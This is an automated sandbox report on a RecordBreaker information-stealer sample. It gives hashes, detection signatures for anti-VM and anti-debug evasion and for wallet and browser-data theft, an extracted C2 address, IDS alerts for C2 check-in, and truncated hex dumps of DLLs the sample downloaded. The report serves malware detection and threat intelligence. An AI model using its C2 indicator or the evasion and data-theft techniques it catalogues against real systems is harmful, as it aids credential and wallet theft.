Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VASkmEQ4iU.exe

Overview

General Information

Sample Name:VASkmEQ4iU.exe
Analysis ID:652389
MD5:f9b340f49ab31913222c64d3eed70ed3
SHA1:4246faa6c02672009aaf44940ec9e1c9f3e72df9
SHA256:06cd1b17015926da3c902f7b67e130054e9170f355a1cdf1274ddc955f4152ee
Tags:exeRecordBreaker
Infos:

Detection

Record Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Record Stealer
Snort IDS alert for network traffic
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to steal Crypto Currency Wallets
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Query firmware table information (likely to detect VMs)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Is looking for software installed on the system
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
PE file contains more sections than normal
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Entry point lies outside standard sections

Classification

  • System is w10x64
  • VASkmEQ4iU.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\VASkmEQ4iU.exe" MD5: F9B340F49AB31913222C64D3EED70ED3)
  • cleanup
{"C2 url": ["http://185.62.56.113/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RecordStealerYara detected Record StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RecordStealerYara detected Record StealerJoe Security
      00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RecordStealerYara detected Record StealerJoe Security
        00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RecordStealerYara detected Record StealerJoe Security
          00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RecordStealerYara detected Record StealerJoe Security
            00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RecordStealerYara detected Record StealerJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              0.3.VASkmEQ4iU.exe.1a1aca3.3.unpackJoeSecurity_RecordStealerYara detected Record StealerJoe Security
                0.3.VASkmEQ4iU.exe.1a1aca3.2.unpackJoeSecurity_RecordStealerYara detected Record StealerJoe Security
                  0.3.VASkmEQ4iU.exe.1a1aca3.6.unpackJoeSecurity_RecordStealerYara detected Record StealerJoe Security
                    0.3.VASkmEQ4iU.exe.1a1aca3.4.unpackJoeSecurity_RecordStealerYara detected Record StealerJoe Security
                      0.2.VASkmEQ4iU.exe.1a1aca3.2.unpackJoeSecurity_RecordStealerYara detected Record StealerJoe Security
                        Click to see the 4 entries
                        No Sigma rule has matched
                        Timestamp:192.168.2.5185.62.56.11349758802036934 06/26/22-09:36:19.847678
                        SID:2036934
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:185.62.56.113192.168.2.580497582036955 06/26/22-09:36:19.915392
                        SID:2036955
                        Source Port:80
                        Destination Port:49758
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.5185.62.56.11349758802036882 06/26/22-09:36:19.847678
                        SID:2036882
                        Source Port:49758
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: VASkmEQ4iU.exeReversingLabs: Detection: 48%
                        Source: VASkmEQ4iU.exeJoe Sandbox ML: detected
                        Source: 00000000.00000002.480998918.00000000019DA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Record Stealer {"C2 url": ["http://185.62.56.113/"]}
                        Source: VASkmEQ4iU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: VASkmEQ4iU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
                        Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
                        Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
                        Source: Binary string: nss3.pdb source: nss3.dll.0.dr
                        Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                        Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2036882 ET TROJAN Generic Stealer Config Download Request 192.168.2.5:49758 -> 185.62.56.113:80
                        Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.5:49758 -> 185.62.56.113:80
                        Source: TrafficSnort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 185.62.56.113:80 -> 192.168.2.5:49758
                        Source: Malware configuration extractorURLs: http://185.62.56.113/
                        Source: Joe Sandbox ViewASN Name: SNELNL SNELNL
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:20 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:22 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:23 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:24 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:25 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:26 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 